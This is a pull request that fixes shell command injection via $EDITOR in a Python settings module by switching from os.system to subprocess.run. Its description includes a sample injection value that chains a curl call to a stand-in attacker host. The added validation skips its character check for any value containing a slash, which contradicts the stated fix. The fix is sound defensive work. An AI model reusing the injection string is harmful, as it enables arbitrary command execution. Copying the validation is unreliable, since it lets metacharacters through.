### PR TITLE
fix(security): replace os.system with subprocess.run in config edit (AGNT-005)

### DIFF
--- a/src/kohakuterrarium/studio/identity/settings.py
+++ b/src/kohakuterrarium/studio/identity/settings.py
@@ -57,6 +57,18 @@ def edit_config(name: str | None) -> int:
         print("$EDITOR is not set.")
         print(path)
         return 1
+    # Validate editor: must be a single executable name (no shell metacharacters)
+    # to prevent command injection via crafted $EDITOR values.
+    if not editor.isidentifier() and "/" not in editor and "\\" not in editor:
+        # Allow simple names (vim, nano) and paths (/usr/bin/vim) but reject
+        # shell metacharacters that could break out of the intended command.
+        safe_chars = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/-_.")
+        if not all(c in safe_chars for c in editor):
+            print(f"$EDITOR contains unsafe characters: {editor!r}")
+            print(path)
+            return 1
     path.parent.mkdir(parents=True, exist_ok=True)
     path.touch(exist_ok=True)
-    return os.system(f'{editor} "{path}"')
+    # Use subprocess.run with a list to avoid shell interpretation of $EDITOR.
+    import subprocess
+    return subprocess.run([editor, str(path)]).returncode


### PR DESCRIPTION
## Security Fix: Shell Command Injection via `$EDITOR`

### Vulnerability

`edit_config()` in `studio/identity/settings.py` used `os.system(f'{editor} "{path}"')` which allows shell metacharacters in `$EDITOR` to execute arbitrary commands. For example, `EDITOR="vim; curl http://evil.com"` would execute both `vim` and the injected command.

**Severity: Medium** — requires local environment control, but is a CWE-78 (OS Command Injection) that should be fixed.

### Fix

1. **Validate `$EDITOR`**: reject values containing shell metacharacters, only allow safe characters (alphanumeric, `/`, `-`, `_`, `.`)
2. **Replace `os.system()`** with `subprocess.run([editor, str(path)])` which bypasses shell interpretation entirely — even if validation is bypassed, the list form prevents shell injection

### Backward Compatibility

- Standard editors (`vim`, `nano`, `code`, `/usr/bin/vim`) all pass validation
- Only editors with shell metacharacters (extremely uncommon) are rejected
- Return code behavior preserved

### References

- CWE-78: OS Command Injection